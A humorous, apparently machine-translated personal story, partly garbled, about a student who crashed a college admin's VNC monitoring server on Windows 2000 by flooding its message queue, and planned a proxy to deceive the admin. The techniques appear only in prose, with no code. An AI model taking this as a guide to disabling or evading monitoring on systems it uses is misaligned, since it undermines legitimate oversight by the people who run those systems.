Π a lot of programming tales have been published. I like to reminisce about my old foolishness. Well, here's another such story.
I first became interested in computers, especially programming, when I was about 11 years old. At the beginning of high school bΠΎI spent most of my free time fiddling with my C64 and writing in BASIC, and then cutting out the bad code with scissors. .
After school (around the age of 16), British children usually go to college, where they choose to study three or four subjects before entering the university. Given my love of a beige box and tape recorder at home, I decided that studying "computer science" in college was the right choice.
I liked the course more than I expected; there I first met Pascal and Delphi.
During the breaks between classes, students could work on any free machine in the computer room. Imagine: a huge room, designed for about a hundred people, with rows of tables lined with machines - like those where the monitor is on the system unit. Constant buzzing of fans, mouse balls humming on the tables without stopping for a second. There is a strange smell in the air, as if 50-100 hormonal teenagers are periodically replaced to cool hundreds of Pentium III chips.
Despite the health risks, I liked to sit at the computer when I had a free minute.
The admin was on duty in the room, a short middle-aged man who was chosen for this role because of his irrepressible desire to become an evil dictator. I guess so. On duty is an understatement, the guy really loved his job. He was assigned to keep order so that no one uses the training computer for something inappropriate.
And to this day, my intuition tells me that the administrator's bonus directly depended on the number of students he caught by the hand and escorted out of the computer room. I'm pretty sure this guy paid off his mortgage early.
He sat in the far corner of the computer room at a corner table. And it was safe to assume that his fertility monitors had found a way to reproduce with an impressively short gestation periodβthere were so many of them. It remained only to wonder if he really had time to keep track of them all. Of course I'm joking... did I mention that he was very serious about his work?
At that time, the computer network was running Windows 2000. I soon discovered that every time I logged on to the system, a script was launched that told me to start the VNC server from the admin account for remote desktop access. Whenever this guy wanted to spy on you, he connected directly to your car and watched. It was creepy, and if you think about it now, probably illegal.
Having sharpened my teeth in BASIC and C64, I was now writing in C and even some C++. At that time, I was still very interested in the D language, which corrected some of the shortcomings of C ++, as I saw it then.
I used to go to the computer room to read up on something new on D or play around with the Digital Mars D compiler. Occasionally distracting myself from thinking about the great future of D, I wrote C code to hack other Win32 programs through their window handles.
In the good old days of Win32 programming, looking up the window handle was the easiest method for hacking other programs. Obviously, all GUI programs in Windows had a window, even if it wasn't displayed on the screen. By writing a program to retrieve a handle to another process (essentially a reference to it), you could send messages to it. This allowed some basic operations like hiding/showing the program window, as well as some really cool stuff like having a process load an arbitrary DLL into its memory space and start executing code. After the DLL injection, the fun began.
For the first month and a half, this detective didn't really bother me, he only connected to the VNC server on my machine once or twice. But one particular session probably piqued his interest. I was writing some C code to hide the Minesweeper windows (without closing them) to make it easier to play in class when I noticed that the white VNC icon in the system tray turned black. This meant that he was now watching me.
I continued to code as usual, trying not to pay attention to him. In the meantime, the machine began to really slow down, trying to transmit the maximum frame rate to one of the countless monitors in the corner of the room. Windows almost stopped responding when my patience snapped, I logged out and finished for today.
During subsequent visits to the computer room, Colombo showed a keen interest in what I was doing almost every time. After about the fourth time, I decided: something needs to be done about it.
I admit that a reasonable, rational person could simply raise this issue directly with him or his boss. However, I always succumbed to the temptation and quickly persuaded myself to choose a completely different strategy.
"You can't do anything without this VNC server!" I said calmly and decisively to myself several times.
It was necessary to kill VNC.
I began to enter the computer room with large groups of students and sit as far as possible from the corner with the monitors. It worked for a while and gave me some time to test ideas.
My first attempt, I think you will agree, was rather weak. When I right-clicked on the VNC icon in the system tray, I saw a menu with the magic letters EXIT. Unfortunately, the letters were written in gray outline text. The administrator has disabled the Logout menu item through the Group Policy Editor. I tried to kill the process from Task Manager, but of course it was invisible to me because it was running under a different, more privileged account. Nothing happened.
The VNC server is running on TCP port 5900, I remembered. My next plan was to send broken packets to this port in order to hang it.
For at least a few days, I've been parsing the protocol, sending various forms of well-structured crap on port 5900 and hoping it breaks. In the end, that didn't work either.
I was starting to think that I couldn't get rid of this thing when it suddenly dawned on me: there must be a window there! It needs to be displayed. Maybe it'll have a nice juicy shutdown button that I'll put to good use!
I ran my near-perfect C code to find another process's main window handle - and indeed I found VNC. I felt elated as my fingers dialed WM_SHOWWINDOW. Try to guess what I saw in front of me?
It'S Nothing!
Now I was curious... it had a window, but it was ignoring my messages. I double checked my code to make sure it works. Tested it on several other processes and it worked great. I've tried sending other messages to the VNC window, and still nothing.
And then it dawned on me again!
Thanks to the very thick Charles Petzold, I carefully studied how Win32 processes work inside the system. Every Win32 application has a window as well as a "message queue". Messages caused by user interaction, as well as messages sent by Windows itself, enter the queue, and the application itself decides how to process them.
Not very interesting on its own. But when I realized that a large enough raw message queue was a heuristic for the Window Process Manager to intervene in a hung process, I broke into a sweat of pure serotonin.
Without wasting a second, I returned to my C code, preparing to send another message to the main VNC window. WM_SHOWWINDOW. In a cycle. Eternal. So many posts WM_SHOWWINDOW, which I now knew VNC would try to completely ignore... at its own risk.
I compiled and ran 4K of the most free-spirited code I have ever run. After about three seconds, Windows reported that the process vncserver.Π΅Ρ
Π΅ does not answer, and made an offer that I simply could not refuse:
Do you want to complete this process?
Damn it, YES!
Let me confess that for the rest of the day I was unbearably pleased with myself.
After spending several hours digesting my new superpower, I decided how I would use it. Just killing the session right in front of his eyes was too easy. I had a better idea - to disappear altogether.
After I realized that I could write code that would do two things. It will first take over the newly freed TCP port 5900, previously occupied by an ignorant VNC server process. It will then create a new TCP connection to the VNC server on the given machine. The code will simply proxy all the data between the two sockets, and Colombo will think he is connecting to me, when in fact he will be connecting to a completely different VNC server.
My code will act as a secret bridge between me and some other poor soul of my choice. It was wonderful.
I immediately started writing my fake VNC bridge. Columbo connected to me several times, but I continued to program in front of him. I came to the conclusion that he had no idea about my actions, although I wrote obvious things such as port numbers and comments like // ΠΡΠΎΡΠ°ΠΉ, ΠΆΡΡΠΊΠΈΠΉ ΡΠΏΠΈΠΎΠ½ VNC.
After a couple of days I couldn't get the code to work properly. To make matters worse, I was almost constantly working with a black VNC icon in the system tray. While it was connected, I couldn't release the port to test my code.
If I knew then netcat!
In the end, the nerves could not stand it, after all, I was an impatient 17-year-old boy. Watching the white VNC server icon turn black again, I freaked out, opened up the original code that populated the message queue, and ran it in front of him. I even waited a couple of seconds before clicking End Processjust to make sure he saw it.
If pushing that button hadn't completely convinced me that it was worth it, then his leap from behind his monitor fortress to quickly approach me and escort me out of the room was definitely worth it.
As a result, I was banned from accessing the network for two weeks. Fair punishment, I thought. After about three weeks, the VNC server disappeared from the boot scripts and never showed up again. I never found out if my incident played a part in it or not, but it completely ruined my plan to get fabulously rich by selling my VNC gun to downtrodden students in college computer rooms across the country.
Source: habr.com